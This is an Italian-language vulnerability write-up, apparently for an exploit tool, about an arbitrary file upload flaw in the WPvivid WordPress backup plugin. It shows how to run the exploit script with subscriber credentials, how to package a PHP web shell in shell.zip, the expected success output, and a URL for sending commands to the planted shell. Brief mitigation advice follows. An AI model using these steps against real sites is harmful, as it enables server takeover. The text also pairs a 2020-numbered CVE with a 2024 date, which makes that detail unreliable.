
Pubblicato: 2024-10-16 | Migrazione, Backup, Staging – WPvivid <= 0.9.35 - Autenticato (Abbonato+) Caricamento Arbitrario di File
Il plugin WordPress WPvivid, progettato per migrazioni e backup di siti, è affetto da una vulnerabilità di upload arbitrario di file. Questa vulnerabilità consente a utenti autenticati con privilegi bassi di caricare ed estrarre file ZIP, potenzialmente portando all'esecuzione remota di codice (RCE) se uno script malevolo viene distribuito tra i file estratti.
È stato creato uno script di exploit in Python per sfruttare questa vulnerabilità utilizzando la seguente metodologia:
Se lo sfruttamento ha successo, lo script produrrà:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
Assicurati che un file shell.zip malevolo esista nella stessa directory dello script exploit.
Il file shell.zip deve contenere una web shell PHP (ad esempio nxploit.php).
È necessario un account WordPress valido con privilegi di Subscriber o superiori.
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
Lo script controllerà la versione del target e effettuerà il login con le credenziali fornite.
Se il target è vulnerabile, lo script caricherà shell.zip e lo estrarra.
Se ha successo, lo script fornirà un URL per la shell caricata.
Una volta che la shell è stata caricata ed estratta con successo, puoi interagire con essa inviando comandi tramite un URL:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
Per mitigare questa vulnerabilità, si raccomanda vivamente di:
wp-content/uploads utilizzando .htaccess o configurazioni del server.Questa vulnerabilità rappresenta un rischio serio poiché consente a utenti autenticati di caricare ed eseguire file malevoli su un server WordPress. Gli amministratori del sito dovrebbero prendere provvedimenti immediati per proteggere le loro installazioni.
Disclaimer: Questo documento è destinato esclusivamente a scopi di ricerca etica sulla sicurezza e didattici. Sfruttare vulnerabilità senza autorizzazione è illegale e punibile secondo le leggi applicabili. ( Nxploit | Khaled_alenazi )